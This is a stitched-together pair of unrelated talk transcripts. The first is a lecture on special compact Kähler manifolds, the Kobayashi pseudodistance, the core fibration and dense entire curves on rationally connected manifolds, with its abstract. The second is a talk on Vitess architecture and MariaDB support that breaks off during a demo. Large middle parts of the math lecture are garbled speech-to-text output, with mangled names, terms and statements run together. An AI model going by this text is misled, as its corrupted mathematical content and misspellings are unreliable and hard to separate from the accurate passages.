Thank you very much to the organizers, and also for the proposal to speak here. I will start with just some notation. So X: essentially this is a compact connected Kähler manifold; if you prefer, you can just assume that it is a complex projective manifold, it will make essentially no difference here. And n is the dimension of X; in general I will just remove the subscript. I will write d_X for the Kobayashi pseudodistance on X. For this Kobayashi pseudodistance I give a short, maybe not very intuitive, definition: it is the largest pseudodistance on X. A pseudodistance is a distance from which you remove just the axiom that the distance between two distinct points is strictly positive; so you still have the triangle inequality, but it may degenerate to zero. So d_X is the largest pseudodistance delta on X such that every h in Hol(D, X) is distance-decreasing from (D, p_D) to (X, delta), that is, delta(h(a), h(b)) is at most p_D(a, b). Here Hol(D, X) is the set of holomorphic maps from the unit disk D to X, and p_D is the Poincaré metric on D. So this is a short definition. It has many properties, and I will not be able to say much about them. The only important points are these: first, d_D is the same thing as p_D, so on the unit disk it is an actual metric. On the other hand, d_X is continuous with respect to any metric on X deduced from a Hermitian metric. P index D; thank you, it's better like this. Much better, yeah, I agree. And since that is the Poincaré metric, it is not complicated to show that d_C is identically 0. More generally, let me call an entire curve on X (I will just abbreviate it EC) a non-constant h belonging to Hol(C, X); so this is just a holomorphic map from C to X which is supposed to be non-constant. Since the Kobayashi pseudodistance is continuous with respect to any standard metric on X, you have in fact, for any entire curve h on X, the following: the restriction of d_X to the topological closure of h(C) is identically 0. This property is important; in particular you will have that d_{P^n} is identically 0, and you will also have that d_A is identically 0 for any complex torus A. So you have these properties for the pseudodistance.
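Since everything below is phrased in terms of $d_X$, here are the definition and the vanishing property in display form; the symbols are my transcription of the board, not necessarily the speaker's exact notation.

```latex
% The Kobayashi pseudodistance: the largest pseudodistance on X for which
% every holomorphic disc is distance-decreasing from the Poincare metric.
\[
d_X=\sup\Big\{\delta\ \text{pseudodistance on }X:\
\delta\big(h(a),h(b)\big)\le p_{\mathbb D}(a,b)
\ \ \forall\,h\in\operatorname{Hol}(\mathbb D,X),\ \forall\,a,b\in\mathbb D\Big\}.
\]
% Continuity plus d_C = 0 give, for every entire curve h : C --> X,
\[
d_X\big|_{\overline{h(\mathbb C)}\times\overline{h(\mathbb C)}}\equiv 0,
\qquad\text{hence}\qquad
d_{\mathbb P^n}\equiv 0,
\quad
d_A\equiv 0\ \text{ for every complex torus }A .
\]
```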
Now, this is quite a transcendental object, difficult to describe, but nevertheless we have the following conjecture of Lang, which is quite famous. It concerns X of general type, which means that kappa(X) is equal to n, the dimension, so this is the top possibility for the Kodaira dimension of X: the conjecture is that this should be equivalent to d_X being a metric generically on X. Generically on X means outside of some strict algebraic subset, a subvariety of X; so essentially, outside of something, this should be a metric. And this implies in particular what I will call the GGL property of X, GGL for Green–Griffiths–Lang, which means that any entire curve on X has a strict Zariski closure. This is implied easily by the property above; one can make other statements. And the aim here, unfortunately only conjecturally, is to describe d_X for any X which is compact Kähler, and to describe also, and this will be a qualitative description, the distribution of entire curves on X; here this will be much less precise, so this is a very qualitative description. So, if you want, the general type case corresponds essentially, in the case of curves, to the case where g is at least 2, so the curve is uniformized by the unit disk; the Kobayashi pseudodistance is completely intrinsic, so it is invariant under the automorphism group, and it descends to an actual metric on X. So this is a generalization of curves of general type. And what we shall introduce now, in order to make this description, is a class of manifolds which are opposite to the general type case, and for this reason I will call them special. So the definition is this. Definition: X, which is always assumed to be compact Kähler, is special by definition if it has the following property: for any p positive and for any L which is a rank one locally free subsheaf of Omega^p of X (it is better to assume that it is saturated, but you don't need to assume this), we have kappa(X, L) strictly less than p. And I insist on the fact that the p is the same here and here. So L is rank 1 (excuse me, I have to assume that this is rank 1), and you have kappa(X, L) strictly less than p, and it is very important that you have this. In some sense there is a theorem of Bogomolov which says that this is always bounded by p, not n; it is bounded by the p which is here. So in some sense this means that you have no big rank one subsheaves inside Omega^p. I will explain a little bit later what the motivation is for what I will say, but you can see this class of manifolds as generalized rational and elliptic curves. Why is it so? This is completely obvious, because if X is a curve you have only one choice, which is p = 1, and then Omega^p is Omega^1, which is K_X; so what is excluded in dimension one are just the curves of general type, and what remains are the rational and elliptic curves. And now the conjecture which I make, and I must say that this is fairly bold: Conjecture 1 is that X is special if and only if (so this is only a conjecture) d_X is identically 0, so any two points are at distance 0 for the Kobayashi pseudodistance. And here you can make similar statements; for example, a stronger condition is that any two points x,
Y belonging to X are connected by a chain of entire curves on X of course so you can connect them if you can connect them then you have this property so this is stronger and here you can make also something which is that there exists the C on X and here by this I mean a dance entire entire curve mix here this is dance and here the dance which I mean is the metrically dance not only so this implies this implies in particular that you have ggl of X is not true in particular you should have the risky dance and our course and this is exactly the opposite of this of this situation here so this is you have dance and of course you there are many many many variants that you can give do of this for example and I don't have the time to formulate them but you have stronger the stronger thing is probably this one here this implies implies it doesn't imply actually this one but it implies at least this one and we shall see examples and motivation at least for this conjecture now the important point maybe is that now that there is a splitting theorem if you take any X you can in fact split it into two parts which are subspecial and general type and this is the important thing which makes this special important in my opinion at least and so this is here I must say I will to simplify the exposition and not go into technicalities which are related to birational maps and birational transformations and also normal crossing conditions I will forget about this to give just a simplified exposition but it's possible to take this into account and so we have a theorem for any X any X this means the X like this here for any X there exists a unique C which goes from X to C and which is called the core map core map of X which is such that first the general general fiber is special in the sense which is here so and a general here this is this means that this is outside of a countable union of strict closed subset and we have two the orbit fold base C and delta C of C is of general type and I will briefly explain I will not give exact definition here we have to take into account the orbital base not only the base C if yes I will maybe give some examples so the two extreme cases are when C is equal to X and this happens exactly when X is of general type the other extreme situation is when C is one point and this corresponds to the fact that X is special and now the general situation is a kind of splitting interpolation between these two things with parts special parts and general type part and now what is this orbital base I will not give an exact definition but this is a pair C which is the base and here we have a certain divisor delta C this is a orbital divisor of the form the form sigma of one minus over mj dj so this is a finite sum this is an effective q divisor where the mj are integer mj are greater than two integers integers and dj these are prime divisors and C and so essentially these are all the prime divisors of C the base here over which the fiber is multiple in a certain in a certain sense and the mj is the multiplicity of the generic fiber over this dj I don't give the exact definition it is I don't have the I have the time but this encodes essentially the multiple fibers of of f here and I would I would like to say that the m the mj this is the infimum inf multiplicities not not the gcd the multiplicity if you if you are in the standard case of an elliptic vibration you have the equivalent of the equality in between this and inf and gcd multiplicity so we are us just in the in the classical situation of 
elliptic surfaces and now yes so I have defined this and now let me try to give definition of what can once we have this theorem plus the conjecture one here we can it is let me maybe state a corollary the corollary is that there exists first delta this is a pseudo metric and see there there exists a unique such that we have dx is uh uh c c star this is the small c c um delta c here delta c so the first point is that there is in order to describe we are we want to describe the x we know that along the fibers this pseudo metric this the pseudo metric the x vanishes because the fibers are special and we use a conjecture one so this means that if you want to compute the pseudo distance between two points it depends only on the fibers I said it at least two times okay of course of course so I'm assuming okay maybe okay so then this gives you this thing and now the point is to try to describe a little bit what is dc and so I have I don't have an exact description but at least uh encadrement I don't know I don't know how to turn encadrement I don't know it lies between two things now we have dc this is greater or equal to d index c delta c and this is less than or equal to something similar c of delta c and see moreover we have this thing assuming now and here this d and c delta c these are obi-fold cobeyashi two versions of obi-fold cobeyashi pseudo metric here which are defined like this and now I give the definition um definition let me call first oh maybe yes I will take b this is a smooth connected complex curve so the interesting things for us the things which are interesting are c p1 and d these these are the interesting things uh essentially and then I will call whole of uh b and uh x no c delta c here where uh where is this obi-fold divisor is it is here so this delta c this has this form it is here uh this is the set the set of h belonging to whole of b x such that we have two conditions the first condition a is that uh um yes uh is the set h of b is not included in delta c and the second condition and the condition b is that h star of dj dj is is here oh thank you thank you thank you thank you b c thank you uh h star of dj here this is uh greater than or equal to mj times h minus one of dj I will explain what this means for nj for nj so this means the following if you want I have x c we are here inside of c and so we have our dj d1 maybe d2 and m1 m2 for example and so we have maps from b to c and so what we want is to say that the order of contact here each time you have an order of contact of um of um of h of b with one of these divisor is at least the multiplicity greater than the multiplicity you want to have large contact orders at least to the multiplicity for example is the multiplicity where infinite this you can do this for example this means that h of b should avoid b if you are on x and if this is zero no multiple fibers then you have no restrictions so this is the usual uh co-beyship solometry so you you have this uh and whole star of b and c delta c this will be the same except that we will want that uh h star that mj times h minus one of dj this is the reduced set of points here divides divides uh h star of dj so this means that here the order of contacts we don't want we don't uh um require that they are we don't only require that they they are at least the multiplicity but that they are divisible by the multiplicity which is a stronger property and in particular you always have all star this is included in all here in for this and so here we can speak of here in these 
cases we can speak of divisible orbifold entire curves, or just orbifold entire curves; the same for rational curves, and here for disks. Now the definition: d_{(C, Delta_C)} is the largest pseudodistance on C such that we have the same thing as before, namely h^*(delta) is at most p_D for any h belonging to Hol(D, (C, Delta_C)); so we take just this definition. And for the star version it will be the same, except that we take Hol^* instead. So we have a kind of... no, it lies between the two. When C is one-dimensional, it is possible to show, and Erwan Rousseau did show, that these two coincide; but already in dimension two or more there may be some differences. The best thing one can expect is possibly that, outside of some strict analytic subset, they differ only by something which is positive, but it is not quite clear to me what to expect. And so this is the description I wanted to give, the general, conjectural description of d_X in general. Ah, no, sorry, I'm not completely finished. So now, Conjecture 2. Yes? No, you can show this part, it is not a conjecture: for the orbifold thing you have a decreasing property, as usual, so you have that inequality. But the inequality in the other sense uses the fact that we assume that on the fibres this is zero; and the definition is made precisely so that you can get local sections in the orbifold sense, and so you get it. So to deduce that direction you don't need a conjecture, but this part uses Conjecture 1. Thank you. Now, Conjecture 2. I assume that (C, Delta_C) is a smooth orbifold structure, which means that C is smooth, first, and that Delta_C is supported on a normal crossings divisor. Conjecture 2: if (C, Delta_C) is of general type, and the meaning is that K_C + Delta_C is big on C, that is, kappa(C, K_C + Delta_C) equals the dimension of C, this should imply that d_{(C, Delta_C)} is a metric generically on C. So you have this kind of property. What should I say: this Conjecture 2 is just Lang, but in an orbifold version; it is just the orbifold extension of Lang's conjecture. So what is really new here is maybe the thing which is upstairs. Now I will come to, I don't know if you have questions, so now, special manifolds. We have given the definition somewhere; yes, the definition is here. The first point, which is completely obvious, maybe point zero, is that this is a bimeromorphic property, bimeromorphic plus étale. By étale what I mean is that if X is special, then so is any finite étale cover of X. This may seem easy, but it is surprisingly difficult to show; I don't know an easy proof of it, and this is a difference with some other notions. And in particular this implies that special implies weakly special.
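To keep the statements straight, here are the two orbifold pseudodistances and Conjecture 2 in display form; the notation is my transcription of the board, so treat it as a reconstruction.

```latex
% Two orbifold Kobayashi pseudodistances on the base (C, Delta_C): the largest
% pseudodistances delta for which every orbifold disc (resp. every divisible
% orbifold disc) is distance-decreasing,
\[
d_{(C,\Delta_C)}:\ \delta\big(h(a),h(b)\big)\le p_{\mathbb D}(a,b)
\ \ \forall\,h\in\operatorname{Hol}\big(\mathbb D,(C,\Delta_C)\big),
\qquad
d^{*}_{(C,\Delta_C)}:\ \text{the same with }\operatorname{Hol}^{*}.
\]
% Conjecture 2 (orbifold Lang): if (C, Delta_C) is a smooth orbifold of
% general type, i.e.
\[
\kappa\big(C,\,K_C+\Delta_C\big)=\dim C ,
\]
% then d_{(C, Delta_C)} is a metric generically on C, that is, outside some
% proper subvariety.
```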
Weakly special was the notion whose definition was given in the earlier talks here, and the reason is this: let me just show first that X is certainly not of general type. You just take p equal to n, the dimension, and you see from the definition that kappa(X, K_X) has to be less than n, so it is not of general type. In the general situation, assume that you have a surjective map f from X onto some Z of dimension p; then you just take L to be f^*(K_Z), you apply the definition to f^*(K_Z), and you see that kappa(X, L) is kappa(Z, K_Z), so it has to be strictly less than p. In other words, X cannot map onto something which is of general type. And once you know that this is also an étale property, you can show that X does not map, even after a finite étale cover, onto something of general type; so it is weakly special. Now, we have seen that for curves, rational and elliptic curves are special; in particular this is easy from the definition. Next: X rationally connected implies that X is special, and the proof is fairly easy. Notice that rationally connected means that any two points can be connected by a chain of rational curves, or even by a single one, for example. And we can see now that what is on the right-hand side of the blackboard, in Conjecture 1, is essentially a kind of transcendental version of rational connectedness: we think of special manifolds as a kind of transcendental analogue of rationally connected manifolds. So this generalizes the case where g is 0. Now the case where g is 1: point 3, if kappa(X) = 0, then X is special. This is again not a really easy result; it uses a kind of orbifold version of Viehweg weak positivity of direct images of pluricanonical sheaves. It is easier to show that if c_1(X) = 0 then X is special, in a much stronger form even, but I don't have time to go into this. Point 4: if n = 2, so we are considering the case of surfaces, then X_2 is special if and only if kappa(X) is at most 1 (of course it has to be) and pi_1(X) is virtually abelian. So at least in dimension 2 we have a solution of the conjecture which was given in the earlier talks here. What does it mean in practice? In practice you can look first at kappa equal to minus infinity: in this case we know that X is birational to a product of P^1 with a curve of a certain genus, and specialness just means that this curve is either rational or elliptic. In other terms, when kappa(X) is minus infinity, X is special if and only if it is birational either to P^2 or to P^1 times an elliptic curve. So this is a very simple situation. When kappa is 0, we know that everything is special; in this case X is essentially K3 or abelian, and pi_1 is virtually abelian. If kappa is 1, we have a slightly more difficult situation: we have an elliptic fibration over some base, and here we have to take into account the multiple fibres. This is a very classical result, actually; you can
essentially I forget one case but two cases which are not very complicated after a finite et alcova you get something which has no multiple fibers and over something and so the condition of specialness is that the base again is not a curve of genotype and so this implies that the pi1 virtually abelian and so on so this is the description for unfortunately in higher dimensions starting with any three the situation is much more complicated and there is no simple characterization like this this is more complicated one thing maybe you you see this see this implies that this property is actually deformation invariant and so one can conjecture that this is true also in higher dimensions that being special this is deformation invariant and even that the core map deforms so we have now five remark in order not to believe that this is that this is the essentially the description that for any n i say positive and any k which belongs to minus infinity zero excluded one and n minus one there exists xn and yn above our compact scalar manifolds or even projective manifolds if you want of dimension n with a kappa of xn is kappa of yn and this is k here in this which is this one being special and this one not being special in other terms the coder dimension does not determine specialness in what is expected by this deformation invariance is that for any kappa except for zero and n you have both deformation families where the members are special and then deformation families where the members are not special and probably you you can even make more precise with the dimension of a core and so on you can make many things now property six is that we say if there exists a map five from cn to xn here which is this is just holomorphic but possibly transcendent cn which is non degenerate this means that at the generic point of cn the map is regular first is holomorphic and has also and is a submersive so non-degenerate then this implies then that x is special x is special so this is a version an orbital version in fact of of a Kobayashi Ochihae foreign if you want to prove this with a weekly special instead of special you just have to apply Kobayashi Ochihae foreign so we say in some sense I can say that for example that xn is weekly cn-dominable weekly cn-dominable cn-dominable this would require that this is a map holomorphic for example and this is a surjective at least on a Sarevsky open subset no it's special no no I don't I don't claim this no no I don't I don't claim this I don't I don't expect personally that you can reverse the map here no at least in dimension three possibly even dimension two I will I will go the hmm yes this might happen for example a priori no I I don't maybe maybe hmm I don't know I don't know no no no you need no no yes you need something you want also to send one point in one section do you see in one point maybe then in this case we this is in this sense maybe well what the room yes I think this is yes remark here now send maybe the important point is that in this the the manifolds which are either racy or rationally connected or with kappa is zero in some sense at least the orbifold versions and I don't don't explain what it means the orbifold versions this is a little bit more general kappa is zero this should be the what is called usually the building blocks building blocks for special manifolds spores for special manifolds this means in some sense that you can write the core under some version of cnm cnm conjecture you can write c this is g or n here you can write c the the 
core map, as a composition of 2n fibrations, in which these should be rationally connected in the orbifold sense and those should have kappa equal to zero in the orbifold sense. So this means that you should be able to decompose an arbitrary special manifold into a sequence of fibrations whose orbifold fibres are either, in some sense, rationally connected or of kappa zero. And this is actually the motivation for Conjecture 1; this is the motivation for Conjecture 1. Now we shall see a little bit what happens; maybe I will briefly say something on Conjecture 1 when n is 2 (when n is 1 it is true). When n is 2, it depends which statement we take. So we take a surface X_2, and we would like to show, for example, that if X is special then d_X is identically zero. This is true in this case; we have this direction. We can just look at the classification, and the only difficult cases are when X is a K3 surface, where kappa(X) = 0, or when kappa(X) = 1. In this situation what we have is a result which is due to Buzzard and Lu: they show that, for elliptic surfaces, special implies C^2-dominable in the strong sense, so that there is a map from C^2 to X which is surjective at least onto a Zariski open subset. So you have this strong result, but it is in the elliptic case. It applies of course to that situation, but it does not apply to K3 surfaces which are neither elliptic nor Kummer; in this case we do not have this, but we still have at least that d_X is identically zero. I will not go into the details, but in the projective case you have a much stronger result, actually, because you have many families of elliptic curves covering the K3 surface which intersect transversally at a generic point; so in the case of K3 surfaces you have in particular this property, which is still true. Of course we have this property, but the stronger one is open and we do not know it in this case. So this is the situation. Essentially, for the other direction: d_X identically zero should imply that X is special, or that kappa(X) is at most 1. This is not very difficult to show when kappa(X) is less than 2; the difficult case is when kappa(X) is 2. But in this case we have Lang's conjecture, which claims that this cannot happen; so Lang's conjecture should imply that kappa(X) is at most 1. So essentially, under Lang's conjecture, this conjecture, at least for d_X identically zero, should be true; but of course this is only conjectural. Now I will go to the case of rationally connected manifolds, because this is the easiest case. So what is the situation? If we assume that X is rationally connected, this certainly implies that d_X is 0, because we have rational curves everywhere, essentially in every direction; and it also implies that any two points x, y are connected by even one single rational curve, so in particular by an entire curve. And so the question is now the following. We have this theorem, which is a thing we did with Jörg Winkelmann: if X is rationally connected, then there exists a dense (metrically dense) entire curve on X. We have a more precise result: for any sequence x_n of points in X, and for any sequence of radii epsilon_n strictly positive, there exists h from C to X and t_n in C, with the modulus of t_n larger than n, say, such that the distance from h(t_n) to x_n is at most epsilon_n, and this for every n.
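Here is the quantitative statement in display form, as I transcribed it; $d$ denotes any distance induced by a Hermitian metric on $X$.

```latex
% Theorem (with J. Winkelmann, as stated in the talk).  Let X be a compact
% rationally connected manifold.  For every sequence (x_n) in X and every
% sequence eps_n > 0 there exist a holomorphic map h : C --> X and points
% t_n in C such that
\[
|t_n|\ \ge\ n
\qquad\text{and}\qquad
d\big(h(t_n),\,x_n\big)\ \le\ \varepsilon_n
\qquad\text{for all } n .
\]
% Applying this to a countable dense sequence (x_n) produces a metrically
% dense entire curve on X.
```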
So if you are given an arbitrary sequence of points in X, and some small radii, maybe I will draw what this means: you have a sequence of points in X, and around each one a small ball of radius epsilon_n; then you can get an entire curve which will meet all of these small balls. Here the distance is any distance deduced from a Hermitian metric. So in particular, if you take a sequence of points which is dense inside X, then you get a dense entire curve on X. I would like to mention that when X is unirational (unirational implies rationally connected, of course; X unirational means that you have some dominant rational map from P^n to X), this kind of curve can be constructed more or less explicitly, because you have this map. So when X is unirational, essentially this theorem is empty; and it remains empty as long as we don't have any example of a rationally connected manifold which is not unirational, which is the case. So for the moment there is no application where we cannot apply this easy argument. But nevertheless, I should say that it is expected that general rationally connected manifolds are not unirational, so it is expected that this is not empty. The first case of manifolds which are not known to be unirational are the double covers of P^3 ramified over a smooth sextic surface. These are known to be Fano, and so they are rationally connected, but until now nobody has been able to show that such an example is unirational; so this is an open question, and people usually expect that they might not be unirational. So a corollary, in this case, is the following. Corollary: if S is a smooth sextic, there exists a dense entire curve on P^3, call it h from C to P^3, such that h(C) is tangent to S at any point of S at which h(C) meets S. So we have this corollary, for example. And how does it work? The proof is very simple: we know that the double cover is Fano, hence rationally connected, so we construct a dense entire curve on it, and then we take the image, we compose with the projection pi; and because we have a ramification of order two along S, we get a dense entire curve in P^3 which has this property of being tangent to S at any point where it meets S. So this is an example of a result where, since we do not have unirationality, we do not know how to prove it without using this theorem. And the general expectation, precisely, is the following: if we have something which is an X and a Delta, so this is an orbifold pair here,
which is a say fano in the sense that minus kx plus delta is ample on x if we have then there should exist an entire curve an orbital entire curve maybe i will hold hold from of c and then x delta for example which is dance in x for example this is the general expectation for fano yes okay so here i would like to say that i assume that this delta this is klt not lc lc you might have some trouble with this so this is an example how much do i still have five minutes five minutes okay so i will just finish to to say there are some additional when c1 of x is a row so this is also another interesting case but much more difficult in order to check this kind of property here already yes we don't know whether the solometric vanishes in in this case we don't know it in general there are some special situation where we know it but in general we don't know and the rest which is much more difficult is of course very open so when c1 of x is a row there are some results when you have elliptic vibrations or an agrangian and so on you have some results but this is extremely partial and so i will now give an idea of the proof of a ferrin which is here i mean the ferrin this ferrin here so the main lemma is the following which is not especially complicated in fact the main lemma is if we have f which goes from p1 to x for example and we assume that x is rationally connected and which is very free very free which means the following that f star of px this is ample on p1 and ample on p1 so this means that this is a direct sum of line bundles with positive degree in clear if we have this p1 p1 i will see it as a c union infinity here very free and if i'm given also a which belongs to x and some epsilon which is positive then there exists some h which goes from p1 to x which is again very free and such that ah excuse me i also take some r which is positive and some and such that very free and such that yes that h yes that the distance the distance of h of z h of z and f of z here is less than or epsilon for any z in c such that i have z is less than or equal to r and then yes there exists and there exists also something else the t belonging to c such that the the modulus of t is larger than r plus 1 so to say such that and that distance of h of t and a this is less than or equal to epsilon and so the what is the picture the picture is this one so you have f here and so you have this is f of zero i take here f of infinity which is here and i have here maybe this is the part which is d of zero r here which is here and i have somewhere else a for example which is given here and i have also the epsilon and so the point is that now i will be able to prove to prove to find some t which is large enough here outside of this such that here this is the distance here is less than or equal to epsilon on over this part and here you want you have a that here you have this t the image of t here will be closed it will be also epsilon close to a so this is the idea and so i will just explain in one word how the this we show this this this is very easy actually once you have the appropriate tool is the following that because we have now we can take a rational curve which is again very free which goes through a and f of infinity here and so i can parameterize it in some in the sense that i will call this is g of p1 which goes to x here and so this this is g of zero goes here this is g of infinity here and here i can require that this is say f of a f of one i have these three points here and now what i'm going to to say is just 
that i will use the smoothing technique smoothing technique of collard miauka mori 92 here 92 here so they what they say if you have two three very free rational curves you can deform them you can smooth them deform them to something which is irreducible in general when you let the rational curve degenerate you have a bunch of rational curves but here they do the contrary they can this deformation argument and so you can put this arbitrary close and you can get this one has to pay attention the one has to pay attention this is really the parameterization but this is not a complicated thing because you can do this i see yes i'm i have ah you're still one one minute okay we are not in germany okay so just i i'm finished in i will not and so once you have this what is the rest of the the rest of the proof is that you you construct a sequence construct inductively the sequence of h n which go to p1 to x here where you have the properties distance from um distance from h n of z h n plus one of z this is less than epsilon n divided by two power n plus one here and you want also to have distance of h n of a certain t n and t n here larger than than n distance of h n t n to x n is less than or equal to the thing which is n plus one and so this will say the first property will say that this will converge in the compact open topology to something which has to be holomorphic and then we the second condition we will tell you this so you have this answer and stopping here questions remarks h n where is f n n x n x n this is the sequence the given sequence so this is how to deduce from the main lemma the theorem um i hope soon yes it should be available so in the in the univational case you can actually prescribe the points right certainly i never thought of this but certainly yes okay but this is not that important for the thing we want to to deal with what would happen if at the beginning of your definition start instead of using the codire dimension of l you use the numerical dimension of l yeah i think uh if you use this so you you get a larger class a priori but you might expect that this is the same at the end but uh you know i think might expect that this is about this conjecture one yes do you expect do you expect that there is a single uh in taiaka passing through yeah okay let us say yes it doesn't cost me anything to to say this for the time being yes i would say yes or maybe epsilon close if you prefer okay yes do you see i think yes you might have in some cases but i'm not able to to give conditions a kind of gluing theorem for a little bit like this to deform entire maps to irreducible entire maps to something which is irreducible but i have no idea of what are the conditions yes i know yes i know yes single disco by a chair yes yes so this is why i was yeah yeah but i think i in this case you have a lot of this is much more flexible this should be much more flexible uh any more question if not let's thank you again
|
For complex projective manifolds X of general type, Lang claimed the equivalence between three fields: birational geometry, complex hyperbolicity, and arithmetic. We extend this equivalence to arbitrary X’s by introducing the (antithetical) class of “Special” manifolds and constructing the “Core” fibration, the unique one with special fibres and general type “orbifold” base. We conjecture that special manifolds —which are defined algebro-geometrically by a certain non-positivity of their cotangent bundles— are also exactly the ones having Zariski-dense entire curves (so violating the GGL property). We shall give (j.w. J. Winkelmann) some examples supporting this conjecture. The arithmetic aspect will be skipped.
|
10.5446/52727 (DOI)
|
Welcome. My name is Alkin and I'd like to share some experiences with Vitess. A little bit about myself: I am a senior technical manager at PlanetScale, and I am one of the maintainers of the Vitess project. I'm an open source database evangelist, previously at Percona and at Pythian, with some background in enterprise. I'm also an avid sailor; if you want to talk about sailing, please do find me on Instagram or Twitter. A little bit about PlanetScale, because of the relationship between the Vitess project and the company: it was founded in 2018 by the co-creators of Vitess at YouTube, later Google, and currently has about 45 to 50 employees based around California, working as a completely remote team due to the pandemic. On the Vitess project: the question "what is Vitess?" can be answered as a database clustering system for horizontal scaling of MySQL or MariaDB databases. Why do we say that? It's not a database itself, but a framework that manages existing databases, so we take advantage of both the framework and the database backend. Vitess does not make any changes to the existing running databases such as MySQL or MariaDB. It's a CNCF-graduated project; in fact, it is one of the first database projects in CNCF, which is very important. It is open source, with an Apache 2.0 license, and it has contributors from around the community along with large users of Vitess. Today's agenda: an architectural overview of Vitess, what Vitess is, Vitess use cases, a little bit on sharding, and where we can meet MariaDB; as this is the MariaDB dev room, thank you for inviting me over. On the Vitess architecture basics: Vitess lets you run database infrastructure operations more smoothly, from a single place. Some glossary for the terminology in the Vitess world: a keyspace is a logical database, whether sharded or unsharded; in a sharded keyspace each row has a keyspace ID, determined by a primary VIndex, a Vitess index, on one of its columns. There is a little bit of additional terminology that applies in the Vitess world. VTGate is the proxy server. A VTTablet is a backend server that works like a sidecar. There is also a topology data store, which can be managed by etcd, ZooKeeper, or Consul. Consider a common replication cluster where we have a primary and replicas: a VTTablet attaches to the mysqld process on each node and manages that mysqld in the backend. This coupled structure of a mysqld plus its VTTablet is a tablet. In production you would have multiple clusters, and VTGate manages access to them. So, going back over here: each MySQL server is assigned to a VTTablet, and the VTTablets sit behind VTGate, which is a stateless proxy; it doesn't manage the tablets, it routes the traffic to them. And you can have multiple VTGates; you're not bound to a single one, so there's no single point of failure, and you can scale out the number of connections that point to the clusters you have in the backend. VTGate also routes the traffic to the correct clusters depending on the sharding scheme. Since we intend to shard our data set using Vitess, eventually you have to know where your data sits. You don't have to maintain that yourself; Vitess maintains it, via VTGate, and the queries are routed based on the schema and the sharding scheme.
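Because VTGate speaks the MySQL wire protocol, an application connects to it with an ordinary MySQL or MariaDB client. A minimal sketch; the host and port here are the defaults used by the Vitess local examples, not something stated in the talk, so adjust them for your setup.

```sh
# Connect to VTGate exactly as you would to a single MySQL/MariaDB server.
mysql -h 127.0.0.1 -P 15306 -u root

# At the VTGate prompt, keyspaces show up as databases, and Vitess adds a few
# introspection commands, for example:
#   SHOW vitess_tablets;   -- cell, keyspace, shard, tablet type and state
#   SHOW vitess_shards;    -- shards known to the topology
```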
In this example, let's say we have a commerce database, which is a keyspace, and it's sharded. There's also an unsharded keyspace alongside it; this is important, because you don't have to shard everything, you can still keep unsharded keyspaces in your topology. A query comes in that points to the keyspace, and VTGate knows where that customer ID range lives. The topo is another component in this architecture: it stores the state of the schemas, shards, sharding scheme and tablets, and it can be backed by etcd (we currently use etcd), or by Consul or ZooKeeper, which others use. We don't recommend Consul for some reasons, but you may choose to use it. The topo holds a very small data set and it's mostly cached by VTGate. vtctld is another component in this architecture: a control daemon that runs ad hoc operations against the databases, acts as an API server, reads and writes the topo, and operates on tablets. So these are the components, and the Vitess topology knows all the schemas, shards and clusters, and keeps the latest and greatest state, because in a real production environment these will be changing and you need to keep them up to date as much as possible. The Vitess control plane not only includes these components, but also covers the normal database operations you would do. In a normal production environment you would have some sort of a proxy server, which is covered by VTGate. You would have backup and recovery, which is covered by VTTablet and vtctld; Vitess handles backups and restores, and in this case we can also drive XtraBackup, for different data stores. Integrated failover, which you may know as Orchestrator, is called VTOrc in the Vitess topology. There are sharding schemes, horizontal or vertical, that you can apply. There are also advanced replication options, which allow you to replicate from one keyspace to another, and VStream. There is going to be online DDL support, which is at an experimental stage at this point, driving gh-ost and the Percona Toolkit online schema change tools. And there's more beyond that. In summary, if you have an application that drives traffic through a load balancer, you can point it to VTGate, and the topology server knows your sharding scheme and points to the tablets that hold your data sets. Let's go over the supported backend databases. This is a very popular question in the open source community: what databases and what engines does it support? Vitess is a very MySQL-centric framework, and it works perfectly fine with MySQL 5.7; it's slowly being migrated to 8.0, and it also works with MySQL 8 compatible backends. We already have very large users in the community that are heavily invested in the MySQL backend, with hundreds of thousands of shards. It is also known to work with MariaDB, for compatibility purposes. A frequently asked question is whether it will work for PostgreSQL: it will not work for PostgreSQL; there would need to be another implementation, managed outside of the MySQL infrastructure.
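The sharding scheme that VTGate consults is described by the VSchema stored in the topo. Here is a minimal sketch of what a sharded customer keyspace's VSchema might look like; the table and column names are illustrative assumptions, not taken from the talk.

```json
{
  "sharded": true,
  "vindexes": {
    "hash": { "type": "hash" }
  },
  "tables": {
    "customer": {
      "column_vindexes": [
        { "column": "customer_id", "name": "hash" }
      ]
    }
  }
}
```

With something like this in place, VTGate hashes the customer_id in a query to a keyspace ID and sends the query only to the shard whose range covers it.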
In some cases, your application only needs to scale out on certain parts. And either you have the entire application pointed to Vitess, or you keep sharded and unsharded keyspaces in your topology, or you just scale out where you need to. And also, you can point and create a link to your existing MySQL topology and use Vitess just as the management layer of your MySQL topology without ever changing anything on your back end. You can do sharding and resharding; that's the key point over here. So in the normal case, once you shard, that's it, there's actually no coming back from sharding. With Vitess, since it knows how you sharded, it's able to reshard or unshard your data sets into different keyspaces. And with this, if you scaled out with Vitess, you have simplified and minimized your backup and recovery scenarios by keeping smaller data sets; this is actually a big advantage when we see terabytes of data in a single database and issues with both backup and recovery scenarios. There are some other use cases that you can think of, obviously, but these are the things that just came to my mind. When we come to MariaDB compatibility: for MariaDB, no extensive work has been done, as far as I know, and we are looking for contributors and users. At this point, we have not received much feedback on MariaDB usage. MariaDB 10.4 compatibility is still pending, and there's an open issue on GitHub. And I will be following up with the MariaDB Foundation and the community to see if there's anything we can do to improve that area. So for more resources, please visit vitess.io; there's a user guide and docs over there. It's open source, I can rephrase that, and it's open, so you can see the code. If you are willing to contribute, please see the contributor guide in the documentation. And there's also the Vitess Slack where you can join and start a discussion. I can create a MariaDB room if it doesn't exist, and we can discuss further on that. Let's take a look at how we can drive MariaDB through Vitess. Okay, now we're at the demo section. I have built a local Docker image. As I mentioned earlier, there are a couple of options for testing Vitess against MariaDB. One of them is to build a Docker image. The other one is building locally, compiling from source. The third option is the Vitess operator; there's an open source Vitess operator that you can test against Minikube or your favorite Kubernetes environment like GKE. In this example, I want to demonstrate a simple use case for scaling out a MariaDB database using Vitess. The Docker image is already built to save time, but I want to show you the Dockerfile, and there are going to be some dependencies installed. We set those dependencies per the flavor of the backend engine we use and then build up a cluster; that is the example for this demonstration. Over here, we also have the file for installing local dependencies, and we use etcd for the topo server. I will run this Docker image and build a simple e-commerce application database. Let's say we have an e-commerce database that is struggling to scale, and it has an order table; it keeps customer and product information for the sake of this example. Then we actually want to not only shard but also manage this environment without having any downtime. Basically, we're going to do a small 